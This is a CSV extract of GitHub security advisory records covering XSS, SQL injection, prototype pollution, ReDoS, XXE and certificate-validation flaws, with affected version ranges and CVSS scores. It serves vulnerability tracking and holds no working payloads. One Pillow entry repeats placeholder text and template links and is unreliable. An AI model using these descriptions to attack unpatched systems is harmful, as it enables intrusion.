+ An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'vis-timeline'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28487'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/issues/838'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/pull/840'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/commit/a7ca349c7b3b6080efd05776ac77bb27176d4d3f'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVISJS-1063502'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1063501'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VISTIMELINE-1063500'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:06:41Z', 'nvd_published_at': '2021-01-22T18:15:00Z'}"
+1.4.0,GHSA-4mg9-vhxq-vm7j,2021-11-18T19:46:31Z,2021-04-29T21:52:53Z,,[],SQL Server LIMIT / OFFSET SQL Injection in laravel/framework and illuminate/database,"### Impact
+
+Those using SQL Server with Laravel and allowing user input to be passed directly to the `limit` and `offset` functions are vulnerable to SQL injection. Other database drivers such as MySQL and Postgres are not affected by this vulnerability.
+
+### Patches
+
+This problem has been patched on Laravel versions 6.20.26, 7.30.5, and 8.40.0.
+
+### Workarounds
+
+You may workaround this vulnerability by ensuring that only integers are passed to the `limit` and `offset` functions, as well as the `skip` and `take` functions.
+",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.40.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.40.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.26'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laravel/framework/security/advisories/GHSA-4mg9-vhxq-vm7j'}, {'type': 'PACKAGE', 'url': 'https://github.com/laravel/framework'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/illuminate/database'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/laravel/framework'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T20:17:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-prv2-xwr7-hr57,2021-04-08T20:19:06Z,2021-04-13T15:23:21Z,,['CVE-2019-10798'],Uncontrolled Resource Consumption in rdf-graph-array,rdf-graph-array through 0.3.0-rc6 manipulation of JavaScript objects resutling in Prototype Pollution. The rdf.Graph.prototype.add method could be tricked into adding or modifying properties of Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rdf-graph-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0-rc6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10798'}, {'type': 'WEB', 'url': 'https://github.com/rdf-ext-archive/rdf-graph-array/blob/master/index.js#L211'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-RDFGRAPHARRAY-551803'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:19:06Z', 'nvd_published_at': '2020-02-24T18:15:00Z'}"
+1.4.0,GHSA-m429-fhmv-c6q2,2023-08-31T21:46:29Z,2021-04-20T16:44:07Z,,['CVE-2020-14365'],Improper Verification of Cryptographic Signature in ansible,"A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when `disable_gpg_check` is set to `False`, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.15'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14365'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1869154'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T22:49:57Z', 'nvd_published_at': '2020-09-23T13:15:00Z'}"
+1.4.0,GHSA-j6qj-j888-vvgq,2022-04-22T15:49:55Z,2021-04-06T17:32:00Z,,['CVE-2021-28163'],Directory exposure in jetty,"### Impact
+If the `${jetty.base}` directory or the `${jetty.base}/webapps` directory is a symlink (soft link in Linux), the contents of the `${jetty.base}/webapps` directory may be deployed as a static web application, exposing the content of the directory for download.
+
+For example, the problem manifests in the following `${jetty.base}`:
+```$ tree demo-base/
+demo-base/
+├── etc
+├── lib
+├── resources
+├── start.d
+├── deploy
+│ └── async-rest.war
+└── webapps -> deploy
+
+```
+
+### Workarounds
+Do not use a symlink","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.32'}, {'fixed': '9.4.39'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28163'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r787e47297a614b05b99d01b04c8a1d6c0cafb480c9cb7c624a6b8fc3@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5CXQIJVYU4R3JL6LSPXQ5GIV7WLLA7PI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GGNKXBNRRCZTGGXPIX3VBWCF2SAM3DWS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HAAKW7S66TECXGJZWB3ZFGOQAK34IYHF/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-200', 'CWE-59'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T23:13:08Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}"
+1.4.0,GHSA-5chj-xprr-7qqx,2022-01-04T19:33:28Z,2021-04-22T16:15:33Z,,['CVE-2020-9447'],Cross-site Scripting in GwtUpload,The file-upload feature in GwtUpload 1.0.3 allows XSS via a crafted filename.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.gwtupload:gwtupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9447'}, {'type': 'WEB', 'url': 'https://github.com/manolo/gwtupload/issues/32'}, {'type': 'PACKAGE', 'url': 'https://github.com/manolo/gwtupload'}, {'type': 'WEB', 'url': 'https://www.coresecurity.com/advisories/gwtupload-xss-file-upload-functionality'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:17:42Z', 'nvd_published_at': '2020-02-28T16:15:00Z'}"
+1.4.0,GHSA-6hgr-2g6q-3rmc,2021-10-08T21:22:21Z,2021-04-22T16:11:26Z,,[],Server session is not invalidated when logout() helper method of Authentication module is used in Vaadin 18-19,"`Authentication.logout()` helper in `com.vaadin:flow-client` versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out.
+
+- https://vaadin.com/security/cve-2021-31408","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '6.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-6hgr-2g6q-3rmc'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10577'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/commit/815b967fc84fefa8d3a4d72b9a036f48b0d96326'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow/'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31408'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T14:31:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hj5v-574p-mj7c,2023-08-07T13:05:28Z,2021-04-20T16:39:57Z,,['CVE-2020-29651'],py vulnerable to Regular Expression Denial of Service,A denial of service via regular expression in the py.path.svnwc component of py (aka python-py) through 1.9.0 could be used by attackers to cause a compute-time denial of service attack by supplying malicious input to the blame functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'py'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29651'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/issues/256'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/pull/257'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/pull/257/commits/4a9017dc6199d2a564b6e4b0aa39d6d8870e4144'}, {'type': 'PACKAGE', 'url': 'https://github.com/pytest-dev/py'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYWNYEV3FGDHPIHX4DDUDMFZ6NLCQRC4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CHDTINIBJZ67T3W74QTBIY5LPKAXEOGR/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:17:48Z', 'nvd_published_at': '2020-12-09T07:15:00Z'}"
+1.4.0,GHSA-69q2-p9xp-739v,2022-03-22T22:08:40Z,2021-04-20T16:32:08Z,,['CVE-2020-29128'],XML Injection in petl,"petl before 1.68, in some configurations, allows resolution of entities in an XML document.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'petl'}, 'ecosystem_specific': {'affected_functions': ['petl.io.xml.XmlView']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/security/advisories/GHSA-f5gc-p5m3-v347'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29128'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/issues/526'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/pull/527'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/pull/527/commits/1b0a09f08c3cdfe2e69647bd02f97c1367a5b5f8'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/commit/07420ef8463cc387aea84e2d6241cf556574e2a5'}, {'type': 'WEB', 'url': 'https://github.com/nvn1729/advisories/blob/master/cve-2020-29128.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/petl-developers/petl'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/compare/v1.6.7...v1.6.8'}, {'type': 'WEB', 'url': 'https://petl.readthedocs.io/en/stable/changes.html'}]","{'cwe_ids': ['CWE-91'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T19:20:39Z', 'nvd_published_at': '2020-11-26T05:15:00Z'}"
+1.4.0,GHSA-vf4w-fg7r-5v94,2021-04-23T00:22:49Z,2021-04-07T20:56:55Z,,['CVE-2021-30130'],Improper Certificate Validation in phpseclib,phpseclib before 2.0.31 and 3.x before 3.0.7 mishandles RSA PKCS#1 v1.5 signature verification.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpseclib/phpseclib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpseclib/phpseclib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30130'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/pull/1635'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/releases/tag/2.0.31'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/releases/tag/3.0.7'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/11/msg00024.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/11/msg00025.html'}]","{'cwe_ids': ['CWE-295', 'CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T17:29:49Z', 'nvd_published_at': '2021-04-06T15:15:00Z'}"
+1.4.0,GHSA-g78f-549w-c354,2021-04-07T23:21:37Z,2021-04-13T15:23:59Z,,['CVE-2020-28448'],Prototype Pollution in multi-ini,This affects the package multi-ini before 2.1.1. It is possible to pollute an object's prototype by specifying the proto object as part of an array.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'multi-ini'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28448'}, {'type': 'WEB', 'url': 'https://github.com/evangelion1204/multi-ini/pull/37'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MULTIINI-1048969'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:21:37Z', 'nvd_published_at': '2020-12-22T13:15:00Z'}"
+1.4.0,GHSA-w9fg-xffh-p362,2021-08-31T21:08:01Z,2021-04-13T15:12:51Z,,['CVE-2021-21394'],Denial of service (via resource exhaustion) due to improper input validation on third-party identifier endpoints,"### Impact
+Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion.
+
+### Patches
+The issue is fixed by #9321.
+
+### Workarounds
+Depending on the needs and configuration of the homeserver a few options are available:
+
+1. Using email as third-party identifiers be disabled by not configuring the `email` setting.
+2. Using phone numbers as third-party identifiers can be disabled by ensuring that `account_threepid_delegates.msisdn` is not configured.
+3. Additionally, the affected endpoint patterns can be blocked at a reverse proxy:
+
+ * `^/_matrix/client/(r0|unstable)/register/email`
+ * `^/_matrix/client/(r0|unstable)/register/msisdn`
+ * `^/_matrix/client/(r0|unstable)/account/password`
+ * `^/_matrix/client/(r0|unstable)/account/3pid`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-w9fg-xffh-p362'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21394'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9321'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9393'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T21:01:40Z', 'nvd_published_at': '2021-04-12T21:15:00Z'}"
+1.4.0,GHSA-7359-3c6r-hfc2,2023-01-24T14:59:50Z,2021-04-22T16:22:15Z,,['CVE-2016-11086'],Improper Certificate Validation in oauth ruby gem,"lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does not verify server X.509 certificates if a certificate bundle cannot be found, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-11086'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/issues/137'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/commit/eb5b00a91d4ef0899082fdba929c34ccad6d4ccb'}, {'type': 'PACKAGE', 'url': 'https://github.com/oauth-xx/oauth-ruby'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/releases/tag/v0.5.5'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/oauth'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T18:23:58Z', 'nvd_published_at': '2020-09-24T20:15:00Z'}"
+1.4.0,GHSA-jgpv-4h4c-xhw3,2021-04-22T17:01:01Z,2021-04-23T16:54:36Z,,[],Uncontrolled Resource Consumption in pillow,"### Impact
+_Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for a BLP container, and thus an attempted memory allocation can be very large._
+
+### Patches
+_An issue was discovered in Pillow before 6.2.0. When reading specially crafted invalid image files, the library can either allocate very large amounts of memory or take an extremely long period of time to process the image._
+
+### Workarounds
+_An issue was discovered in Pillow before 6.2.0. When reading specially crafted invalid image files, the library can either allocate very large amounts of memory or take an extremely long period of time to process the image._
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2021-27921
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [example link to repo](http://example.com)
+* Email us at [example email address](mailto:example@example.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 8.1.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/calix2/pyVulApp/security/advisories/GHSA-jgpv-4h4c-xhw3'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T17:01:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p48w-vf3c-rqjx,2021-04-27T19:43:14Z,2021-04-29T21:51:21Z,,['CVE-2021-21365'],Cross-Site Scripting in Bootstrap Package,"### Problem
+It has been discovered that rendering content in the website frontend is vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
+
+The following templates are affected by the vulnerability:
+
+* `Resources/Private/Partials/ContentElements/Carousel/Item/CallToAction.html`
+* `Resources/Private/Partials/ContentElements/Carousel/Item/Header.html`
+* `Resources/Private/Partials/ContentElements/Carousel/Item/Text.html`
+* `Resources/Private/Partials/ContentElements/Carousel/Item/TextAndImage.html`
+* `Resources/Private/Partials/ContentElements/Header/SubHeader.html`
+
+Users of the extension, who have overwritten the affected templates with custom code must manually apply the security fix as shown in [this Git commit](https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b).
+
+### Solution
+Update to version 7.1.2, 8.0.8, 9.0.4, 9.1.3, 10.0.10 or 11.0.3 of the Bootstrap Package that fix the problem described.
+
+Updated version are available from the TYPO3 extension manager, Packagist and at https://extensions.typo3.org/extension/download/bootstrap_package/.
+
+### Credits
+Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.1.0'}, {'fixed': '9.1.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/benjaminkott/bootstrap_package/security/advisories/GHSA-p48w-vf3c-rqjx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21365'}, {'type': 'WEB', 'url': 'https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-007'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T19:43:14Z', 'nvd_published_at': '2021-04-27T20:15:00Z'}"
